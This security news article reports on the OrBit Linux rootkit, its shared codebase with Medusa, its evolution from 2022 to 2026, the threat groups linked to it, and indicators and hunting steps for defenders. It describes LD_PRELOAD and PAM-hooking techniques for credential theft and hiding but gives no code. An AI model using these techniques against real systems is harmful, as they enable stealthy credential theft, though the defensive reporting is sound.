OrBit Rootkit Still Steals Linux SSH and Sudo Credentials in 2026

OrBit, a stealthy Linux rootkit first documented in 2022, is still active in 2026 and continues to help attackers steal SSH and sudo credentials from compromised systems.

New research from Intezer shows that OrBit is not just a one-off custom malware family. The rootkit is tied to the Medusa open-source LD_PRELOAD rootkit codebase, which attackers have reused, reconfigured, and redeployed across several years.

The latest findings matter because OrBit does not behave like simple credential-stealing malware. It embeds itself into the Linux authentication and process environment, hides its own files and network activity, and gives attackers a quiet backdoor into infected machines.

What OrBit does on Linux systems

OrBit runs as a shared object file on Linux. Once installed, it abuses the dynamic linker so its malicious library loads into running processes. This lets the rootkit monitor activity across the system and interfere with what users and security tools can see.

Intezer’s original 2022 analysis described OrBit as a Linux userland rootkit with persistence, SSH backdoor access, credential theft, TTY logging, and extensive function hooking. The newer 2026 research shows the malware has continued to evolve instead of disappearing.

OrBit can hook more than 40 libc functions to hide files, processes, and network connections. It also hooks Pluggable Authentication Module functions, which lets it capture credentials during SSH and sudo authentication attempts.

OrBit capability	What it means for defenders
SSH and sudo credential theft	Attackers can collect valid usernames and passwords from infected systems.
Dynamic linker abuse	The malicious library can load into processes across the system.
File and process hiding	Standard Linux commands may not show the malware or its artifacts.
SSH backdoor access	Attackers can reconnect without noisy command-and-control traffic.
PAM manipulation	Newer builds can interfere with authentication results, not just collect passwords.

OrBit and Medusa share the same rootkit codebase

Intezer’s 2026 analysis links OrBit to Medusa, an open-source LD_PRELOAD rootkit published on GitHub in December 2022. Researchers compared OrBit samples with Medusa builds and found matching source-file fingerprints, hook structures, and obfuscation patterns.

This changes the way defenders should look at the malware. The threat is not only one attacker’s private tool. It is a reusable codebase that different operators can compile with new credentials, paths, encryption keys, and deployment methods.

That flexibility makes detection harder. A defender may see a different username, password, hidden folder, or XOR key, but the underlying rootkit structure can remain the same.

How OrBit changed between 2022 and 2026

Intezer tracked more than a dozen OrBit samples from 2022 through early 2026. The samples split into two main build paths: a full-featured Lineage A version and a lighter Lineage B version.

Lineage A carried the broader attack toolkit, including credential capture, hiding features, and network-related functions. Lineage B dropped several capabilities to reduce its footprint. According to Intezer, Lineage B has not surfaced since 2024, which suggests operators may have moved back toward the fuller build.

The most important capability change appeared in 2025. A newer OrBit build added a hook for pam_sm_authenticate, a server-side PAM authentication function. That means the rootkit can move beyond passive credential collection and interfere with authentication outcomes.

• 2022 samples used the original OrBit-style full build.
• Later 2022 samples shifted to the libseconf working directory.
• 2023 samples introduced a lighter Lineage B build.
• 2024 samples showed more diversity, including a 0xAA XOR key rotation.
• 2025 samples added stronger authentication manipulation through pam_sm_authenticate.
• 2026 samples still showed Lineage A activity with the libseconf working directory.

Attackers use OrBit for stealth and persistence

OrBit’s main strength is stealth. It can store credentials and configuration files in hidden locations, then stop normal system tools from showing those files.

Earlier OrBit activity used paths such as /lib/libntpVnQE6mk/. Later variants commonly used /lib/libseconf/. Other observed paths include /lib/locate/, which appeared in activity linked by researchers to the UNC3886 cluster through Mandiant’s MEDUSA reporting.

The malware can also keep network activity hidden. This matters because attackers do not always need to call out to a command server. In many cases, they can connect back through the SSH backdoor when they want access.

Multiple threat groups have used the same codebase

Intezer says the presence of OrBit across several years does not point to one single operator. Instead, the research identifies at least three separate operator clusters using the same or related codebase.

Mandiant previously reported that UNC3886, a suspected China-nexus espionage actor, used MEDUSA and its SEAELF installer during operations involving VMware and other infrastructure. Intezer says Mandiant’s MEDUSA details match its 2024 OrBit Lineage A cluster across several fields, including the 0xAA key, backdoor credentials, install path, and strace redirection artifact.

CrowdStrike’s 2026 Global Threat Report also notes that BLOCKADE SPIDER used the OrBit backdoor to maintain stealthy access in virtualization environments. Intezer also observed a 2025 dropper chain with similarities to RHOMBUS-linked infrastructure, although it cautioned that this connection should not drive attribution by itself.

Threat activity	Connection to OrBit or Medusa
UNC3886	Mandiant reported MEDUSA use in espionage operations involving virtualized environments.
BLOCKADE SPIDER	CrowdStrike linked the actor to OrBit use for stealthy persistence in virtualization environments.
RHOMBUS-linked infrastructure	Intezer observed a 2025 two-stage chain with shared architecture and domain overlap.

Why Linux defenders should care

Linux servers often host cloud workloads, internal services, databases, build systems, and virtualization infrastructure. A rootkit that steals SSH and sudo credentials can help attackers move deeper into an environment while using legitimate access paths.

This makes OrBit especially dangerous in enterprise networks. Once attackers collect valid credentials, they may not need noisy exploitation attempts. They can log in, move laterally, and maintain access while appearing more like a real administrator.

The rootkit also shows why defenders should not rely only on standard Linux command-line checks after a suspected compromise. If OrBit has hooked core functions, commands such as ls, ps, netstat, or similar tools may not show the full truth.

Detection tips and indicators to watch

Intezer recommends looking for recurring artifacts that appear across OrBit and Medusa builds, even when operators change credentials or installation paths.

Useful signs include unexpected files such as sshpass.txt, sshpass2.txt, .logpam, .ports, and hidden directories such as /lib/libseconf/. Defenders should also investigate suspicious use of /etc/ld.so.preload, unexpected dynamic linker changes, and unusual cron jobs that fetch remote shell scripts.

Security teams should combine file-system checks with memory analysis, EDR telemetry, YARA rules, and offline forensic review. A trusted live response environment can help avoid results filtered by the rootkit itself.

• Check /etc/ld.so.preload for unexpected entries.
• Look for hidden folders under /lib and /usr/lib.
• Hunt for sshpass.txt, sshpass2.txt, .logpam, .ports, and .pts artifacts.
• Review cron.hourly entries for suspicious download commands.
• Compare process, network, and file listings from trusted offline tools.
• Rotate SSH and sudo credentials after confirming compromise.
• Rebuild affected systems when rootkit-level compromise is confirmed.

What admins should do now

Organizations running Linux servers should treat OrBit as a persistence and credential theft threat, not just a malware cleanup issue. Removing the files may not fix the broader problem if attackers already collected valid credentials.

Admins should review privileged account use, rotate exposed credentials, check SSH keys, audit sudo activity, and inspect systems that share credentials with the infected host. They should also review virtualization servers and cloud-hosted Linux systems, where stealthy access can create wider impact.

The broader lesson is clear. Public rootkit code can become a long-running enterprise threat when attackers adapt it across campaigns. OrBit’s continued activity shows that older Linux malware families can remain dangerous when operators keep changing deployment details.

FAQ